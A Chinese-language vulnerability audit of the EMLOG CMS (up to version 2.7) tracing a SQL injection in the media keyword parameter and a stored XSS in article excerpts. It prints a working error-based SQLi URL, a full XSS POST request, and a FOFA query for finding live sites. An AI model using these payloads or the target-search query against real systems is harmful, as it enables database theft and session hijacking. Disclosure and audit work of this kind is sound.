【代码审计】Emlog存在SQL注入+XSS漏洞

1.源码简介
EMLOG 是一款轻量级开源博客和CMS建站系统，速度快、省资源、易上手，适合各种规模的站点搭建。
2.漏洞描述
EMLOG $keyword参数存在SQL注入漏洞。
EMLOG article.php文件active_post参数存在XSS漏洞

3.影响范围

EMLOG <=2.7版本
FOFA:a
App="EMLOG"&&is_domain=true&&country="CN"
危害级别：高

4.代码审计过程

一、SQL注入漏洞分析过程

1、首先打开emlog_pro_2.5.7\admin\media.php文件，$keyword参数由此传入。在media.php中，keyword参数通过Input::getStrVar('keyword')获取。

如下图：

2、接着，这个参数被传递到Media_Model的getMedias和getMediaCount方法中如下图

3、在Media_Model类的getMedias方法里，构造SQL查询时，直接使用了$keyword变量，并将其拼接到SQL语句中。具体代码行是：emlog_pro_2.5.7\include\model\media_model.php第29行，如图

4、这里明显没有对$keyword进行任何过滤或转义处理，直接将其插入到SQL语句中。

二、XSS分析过程
1、漏洞点在emlog_pro_2.5.7\admin\articel_save.php文件，第45-50行。当$auto_excerpt为'y'时，代码使用Parsedown解析Markdown内容生成HTML摘要。若原始内容包含恶意HTML（如），转换后的HTML会被直接存储。若前端未转义摘要内容，将触发XSS。

2、跟进extractHtmlData方法未作相关过滤

3、接着$excerpt,赋值给$logData

4、最后在articel_save.php文件，第89行通过doMultiAction保存

5、跟进doMultiAction，通过钩子直接保存数据

综上若原始内容包含恶意HTML（如），转换后的HTML会被直接存储。若前端未转义摘要内容，将触发XSS。
4. 搭建环境进行验证：
Apache.2.4.39

MySql5.7.26

Php5.6.9

安装：先在msyql创建emlog数据库再访问web安装即可

1、sql注入验证：
http://127.0.0.1:8099/index.php?keyword=%2527 AND updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)%20%20--%2520

2、xss验证：

POST /emlog_pro_2.5.7/admin/article_save.php HTTP/1.1
Host: 192.168.17.103
Content-Length: 1796
Cache-Control: max-age=0
Origin: http://192.168.17.103
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7dLxxHHoddxnJMVB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.17.103/emlog_pro_2.5.7/admin/article.php?action=edit&gid=2
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1744352762; tw_comment_author=1; tk_ai=1%2BA2fri83NiO%2FIPjMIdteEBR; PHPSESSID=24fggvmjq26us7riv236npp743; EM_AUTHCOOKIE_O5MScKeTFAaXFCEtXoNG5gLYyH9s5X4Y=admin%7C0%7Cd6687300a74ea0f8afb2e7164704c7cb; em_saveLastTime=1745478698706
Connection: keep-alive
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="title"
111
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="logcontent"
body"><img src="xss" onerror="alert(/111111111111111/)">
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="logexcerpt"
1111
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="ishide"
n
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="as_logid"
2
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="gid"
2
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="author"
1
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="cover"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="upload_img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="sort"
-1
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="tag"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="postdate"
2025-04-24 14:37:07
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="allow_remark"
y
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="alias"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="link"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="password"
------WebKitFormBoundary7dLxxHHoddxnJMVB--

5. nuclei检测脚本：
   公众号回复Emlog获取检测脚本和源代码
   

6.修复建议

建议使用专门的 Web 应用程序防火墙（WAF）来检测和防止 SQL 注入攻击。WAF 可以提供更强大的安全性，包括自定义规则、恶意模式检测和更高级的防护。